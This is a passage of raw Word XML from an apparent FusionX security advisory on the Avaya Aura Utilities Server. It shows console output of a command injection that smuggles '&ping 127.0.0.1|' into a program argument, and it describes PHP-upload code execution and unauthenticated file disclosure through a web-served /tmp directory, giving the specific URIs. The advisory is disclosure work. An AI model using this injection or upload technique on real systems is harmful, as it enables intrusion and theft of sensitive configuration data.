      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output showing </w:t>
      </w:r>
      <w:r w:rsidR="00643812">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidR="00643812">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> code execution of a ping request:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="000C10D8" w14:paraId="6ADAE0F5" w14:textId="77777777" w:rsidTr="000C10D8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="569A0985" w14:textId="0A0DF9C0" w:rsidR="000C10D8" w:rsidRDefault="000C10D8" w:rsidP="000C10D8">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pstree</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -al</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">… </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="319660E7" w14:textId="6E6C0AFB" w:rsidR="000C10D8" w:rsidRDefault="000C10D8" w:rsidP="000C10D8">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  |   |-httpd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="711045FF" w14:textId="77777777" w:rsidR="000C10D8" w:rsidRDefault="000C10D8" w:rsidP="000C10D8">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  |   |   `-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -c /opt/mvap/web/sms-bin/ossicm\040-h127.0.0.1\040-p22&amp;ping\040127.0.0.1|\040-l4101\040-d/opt/mvap/web/sms/templates_c/\040-s\040-n\040-z\040</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185A3DCD" w14:textId="77777777" w:rsidR="000C10D8" w:rsidRDefault="000C10D8" w:rsidP="000C10D8">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  |   |       |-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ossicm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -h127.0.0.1 -p22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2122F3A1" w14:textId="77777777" w:rsidR="000C10D8" w:rsidRDefault="000C10D8" w:rsidP="000C10D8">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  |   |       `-</w:t>
            </w:r>
            <w:r w:rsidRPr="000C10D8">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>ping 127.0.0.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29EFAD5F" w14:textId="57C0D850" w:rsidR="000C10D8" w:rsidRDefault="000C10D8" w:rsidP="000C10D8">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CA941FD" w14:textId="77777777" w:rsidR="00D52039" w:rsidRDefault="00D52039"/>
    <w:p w14:paraId="67C82D10" w14:textId="312FA683" w:rsidR="0098583E" w:rsidRDefault="0098583E" w:rsidP="00D52039">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Ref58932075"/>
      <w:r>
        <w:t>2) Post-Authentication Remo</w:t>
      </w:r>
      <w:r w:rsidR="4C50E030">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>e Code Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="58F41A1B" w14:textId="2E7A17BD" w:rsidR="002B26FF" w:rsidRDefault="008779B2" w:rsidP="002B26FF">
      <w:r w:rsidRPr="008779B2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>CVSS</w:t>
      </w:r>
      <w:r w:rsidR="00883EE3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.1</w:t>
      </w:r>
      <w:r w:rsidRPr="008779B2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00883EE3">
        <w:t>9.1 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008779B2">
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008779B2">
        <w:t>/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H</w:t>
      </w:r>
      <w:r w:rsidR="00883EE3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E8A61A" w14:textId="102A23C4" w:rsidR="008779B2" w:rsidRPr="00883EE3" w:rsidRDefault="00883EE3" w:rsidP="002B26FF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00883EE3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFA0F4F" w14:textId="72220143" w:rsidR="00883EE3" w:rsidRDefault="00883EE3" w:rsidP="0098583E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> found that the “admin” user can use multiple upload features within the administration section of the Avaya Aura Utilities Server to upload arbitrary files (including PHP code) to the web directory where they can be executed as the “apache” user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B107D9" w14:textId="25DB58CC" w:rsidR="00883EE3" w:rsidRPr="00883EE3" w:rsidRDefault="00883EE3" w:rsidP="0098583E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Technical Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE9102B" w14:textId="1582B977" w:rsidR="0098583E" w:rsidRDefault="0098583E" w:rsidP="0098583E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> found that the “admin” user can use either the “Upload Files” feature located at URI “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>utilserv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>diagUpload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>w_diagUpload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” or the “IP Phone Customer File Upload” feature located at URI “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>utilserv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>confIPCustom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>w_confIPCustom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to upload files which are stored in “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D021F0">
        <w:t>Both of these</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D021F0">
        <w:t xml:space="preserve"> file upload sections of the application allow arbitrary files to be uploaded. </w:t>
      </w:r>
      <w:r>
        <w:t>This folder is served via the URI “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” and PHP code is interpreted under the “apache” user. This vulnerability would allow an attacker with “admin” level access to the web </w:t>
      </w:r>
      <w:r w:rsidR="00D021F0">
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to gain arbitrary, low-privileged code execution on the server </w:t>
      </w:r>
      <w:r w:rsidR="00D021F0">
        <w:t xml:space="preserve">by uploading malicious PHP scripts </w:t>
      </w:r>
      <w:r>
        <w:t>which in conjunction with other issues</w:t>
      </w:r>
      <w:r w:rsidR="344DA1D7">
        <w:t xml:space="preserve"> described</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in this report would allow privilege escalation to root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F605A87" w14:textId="434D0414" w:rsidR="005E043B" w:rsidRDefault="005E043B" w:rsidP="0098583E">
      <w:r>
        <w:t>Though</w:t>
      </w:r>
      <w:r w:rsidR="004524EC">
        <w:t xml:space="preserve"> in default configurations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> users with the “admin” account may have SSH access, and thus arbitrary command execution</w:t>
      </w:r>
      <w:r w:rsidR="00D021F0">
        <w:t xml:space="preserve"> as the admin user via SSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D021F0">
        <w:t xml:space="preserve">it is quite </w:t>
      </w:r>
      <w:r>
        <w:t>common to disable SSH except from trusted networks or require SSH keys</w:t>
      </w:r>
      <w:r w:rsidR="004524EC">
        <w:t xml:space="preserve"> to further harden the server</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004524EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D021F0">
        <w:t xml:space="preserve">This was the configuration </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D021F0">
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D021F0">
        <w:t xml:space="preserve"> discovered in a client’s environment. In such a configuration, these </w:t>
      </w:r>
      <w:r w:rsidR="004524EC">
        <w:t>hardening</w:t>
      </w:r>
      <w:r w:rsidR="00D021F0">
        <w:t xml:space="preserve"> steps</w:t>
      </w:r>
      <w:r w:rsidR="004524EC">
        <w:t xml:space="preserve"> would be at least partially undone by this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDBCCA" w14:textId="77777777" w:rsidR="00415140" w:rsidRDefault="00415140" w:rsidP="00415140">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Ref59005697"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3) Sensitive File Disclosure and Apache Misconfiguration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="676100F3" w14:textId="0A6EEAFB" w:rsidR="00D021F0" w:rsidRDefault="00D021F0" w:rsidP="0098583E">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 3.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>6.8 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D021F0">
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D021F0">
        <w:t>/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C394CF7" w14:textId="79F75752" w:rsidR="00D021F0" w:rsidRPr="00D021F0" w:rsidRDefault="00D021F0" w:rsidP="0098583E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D021F0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B6CD46" w14:textId="4067D468" w:rsidR="00415140" w:rsidRDefault="00415140" w:rsidP="0098583E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> discovered that many administrative processes used by the Avaya Aura Utilities Server copy sensitive configuration files to the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory. This, in and of itself, can result in disclosure and race </w:t>
      </w:r>
      <w:r w:rsidR="53B0B87D">
        <w:t xml:space="preserve">condition </w:t>
      </w:r>
      <w:r>
        <w:t>issues whenever an attacker gains command line access</w:t>
      </w:r>
      <w:r w:rsidR="3324622C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> however this problem is severely exacerbated </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>due to the fact that</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> unauthenticated users can access any file in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> via the “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” URI. PHP files are interpreted but are run as the “apache” user.  Even files owned and only </w:t>
      </w:r>
      <w:r w:rsidR="00DC7DBE">
        <w:t xml:space="preserve">accessible to the </w:t>
      </w:r>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00DC7DBE">
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be downloaded or executed. As mentioned in issue “</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref58932075 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>2) Post-Authentication Remote Code Execution</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>” this issue can be used to get post-auth low-privilege arbitrary code execution directly via file uploads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB77F53" w14:textId="5F0055BE" w:rsidR="00CC0201" w:rsidRDefault="00CC0201" w:rsidP="0098583E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Technical Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE63A75" w14:textId="691B29A4" w:rsidR="00CC0201" w:rsidRDefault="00CC0201" w:rsidP="0098583E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Much of the administrative section actions use the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder as a scratch location to perform</w:t>
      </w:r>
      <w:r w:rsidR="0006413C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">administrative tasks. In many cases these files are not cleaned up. For instance, making changes to DHCP configurations result in a copy of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>dhcpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file being written to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where it is not removed (see issue “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref58996119 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t xml:space="preserve">8) Root Privilege Escalation via Overly Permissive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00011234">
        <w:t>Sudoer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00011234">
        <w:t xml:space="preserve"> Configuration (DHCP Daemon Configuration Process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>”). The backup</w:t>
      </w:r>
      <w:r w:rsidR="00DC7DBE">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and restore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> process</w:t>
      </w:r>
      <w:r w:rsidR="00DC7DBE">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> also use the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory to house the backup “tar.gz” file, which uses predictable nam</w:t>
      </w:r>
      <w:r w:rsidR="00DC7DBE">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ing schemes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>. Th</w:t>
      </w:r>
      <w:r w:rsidR="0D735DE6">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ese</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r w:rsidR="00643812">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will continue to persist indefinitely (until system reboot or until </w:t>
      </w:r>
      <w:r w:rsidR="00643812">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>they are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> manually removed) and these files can be accessed by unauthenticated users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D59DCD5" w14:textId="35F50394" w:rsidR="00CC0201" w:rsidRDefault="00CC0201" w:rsidP="0098583E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CE434D8" wp14:editId="5D2D8285">
            <wp:extent cx="5943600" cy="1571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1625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="139727C0" w14:textId="5220E1AC" w:rsidR="00CC0201" w:rsidRPr="00CC0201" w:rsidRDefault="00DC7DBE" w:rsidP="0098583E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>An authenticated attacker may be able to gain access to significant, sensitive information by conducting various operations within the admin section of the application, then performing web requests to access sensitive system file copies that are left lying within the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory. An unauthenticated attacker might be able to gather sensitive information by performing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>a large number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests with the</w:t>
      </w:r>
      <w:r w:rsidR="00643812">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> likely</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> names of sensitive files that </w:t>
      </w:r>
      <w:r w:rsidR="00643812">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> end up in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>. Furthermore, for an attacker that has managed to gain any level of code execution, the blanket serving of the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
